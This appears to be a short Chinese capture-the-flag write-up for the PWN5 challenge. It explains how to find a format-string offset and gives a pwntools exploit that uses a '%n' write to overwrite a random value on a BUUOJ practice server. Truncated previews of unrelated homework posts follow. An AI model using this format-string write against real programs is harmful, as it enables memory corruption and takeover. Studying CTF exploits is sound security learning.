一道格式化字串的題
先輸入aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x········來確定輸入首位址的偏移(找到41414141就是aaaa)
之後只要修改隨機數的值,讓輸入和隨機數的值一樣就可以了
exp如下:
from pwn import
*context(log_level =
'debug'
,arch =
'i386'
,os =
'linux'
)#r = process('./pwn5')
r=remote(
'node3.buuoj.cn'
,25046
)target =
0x0804c044
offset =
'%10$n'
p = flat(
[target, offset]
)r.sendlineafter(
':', p)
r.sendlineafter(
':',
str(
0x4)
)r.interactive(
)
第五空間2019 決賽 PWN5
格式化漏洞講解 x是吧資料以16進製制輸出 n是把已經輸出的字元數目輸入傳來引數的位址中,這就可以使我們修改資料 格式 12 x 可以直接定位到地12個引數 其他 p,s,n等類似 一般來說 先輸入 aaaa 08x 08x 08x 08x 08x.來判斷我們輸入首位址的偏移 找到41414141就...
2019第五周作業
這次作業屬於哪個課程 c語言程式設計 這次作業要求在 第五周作業 我在這個課程的目標是 學習字串陣列的運用及其計算 這個作業具體在那個方面幫助我實現目標 這個作業讓我知道了字串陣列的定義及其運用,讓我更加全面了解陣列知識 參考文獻 無輸入給出一行字元。在一行中輸出單詞個數。let s go to r...
2019 第五周作業
2019春季第五周作業 這個作業屬於哪個課程 c語言程式設計ll 這個作業要求在 我在這個課程的目標是 希望能多了解一維字元陣列及字串的用法,以後碰見類似的題目時能夠不出錯誤的做出來 這個作業在哪個具體方面幫助我實現目標 這個作業讓我大概了解了使用字串程式設計,並且對一維陣列有了更深入的了解 參考文...